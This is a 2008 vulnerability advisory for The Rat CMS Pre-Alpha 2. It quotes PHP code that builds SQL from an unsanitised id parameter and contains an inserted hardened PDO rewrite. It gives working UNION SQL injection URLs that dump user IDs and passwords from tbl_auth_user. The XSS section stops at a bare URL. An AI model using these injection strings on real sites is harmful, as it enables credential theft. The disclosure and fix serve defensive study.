===========================================================
The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities
===========================================================

AUTHOR : CWH Underground
DATE : 25 June 2008
SITE : cwh.citec.us


#####################################################
APPLICATION : The Rat CMS
VERSION : Pre-Alpha 2
VENDOR : N/A
DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms
#####################################################

--- Remote SQL Injection ---

---------------------------------------
Vulnerable File [viewarticle.php?id=]
---------------------------------------

@Line 5

73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
74: $result = mysql_query($query) or die('Error : ' . mysql_error());
75: $row = mysql_fetch_array($result, MYSQL_ASSOC);


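Hardened form of the lookup above, as an added example (not code from The Rat CMS or from the advisory's authors). It assumes PDO is available and uses an in-memory SQLite database with constructed rows so it runs offline; fetchArticle() and h() are hypothetical helper names.

```php
<?php
// Added example, not The Rat CMS code: the viewarticle.php lookup with the
// id validated as an integer and bound as a parameter instead of concatenated.
declare(strict_types=1);

/**
 * Fetch one article by id. Returns null for a malformed or unknown id.
 * Table and column names (news, id, title, content) come from the advisory.
 */
function fetchArticle(PDO $db, $rawId): ?array
{
    // Accept only a plain positive integer; arrays, comment sequences,
    // UNION clauses and negative values are rejected before any query runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The placeholder keeps the value out of the SQL text entirely.
    $stmt = $db->prepare('SELECT title, content FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** General output encoding: stored markup is displayed, not rendered. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data. Assumption: the real application talks to MySQL;
// only the PDO DSN would differ.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$db->exec("INSERT INTO news VALUES (1, 'Hello', '<b>first</b> post')");

// Constructed inputs: a valid id, an unknown id, and a value shaped like
// the advisory's injected parameter.
foreach (['1', '42', '-9999/**/UNION/**/SELECT/**/1,2--'] as $input) {
    $row = fetchArticle($db, $input);
    echo $row === null
        ? "id rejected or not found\n"
        : h($row['title']) . ': ' . h($row['content']) . "\n";
}
```

Only the first input returns a row. Database errors surface as exceptions to be logged server-side rather than echoed to the client the way die('Error : ' . mysql_error()) does.
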
---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]


-------------
POC Exploit
-------------

http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--


--- Remote XSS ---

---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php/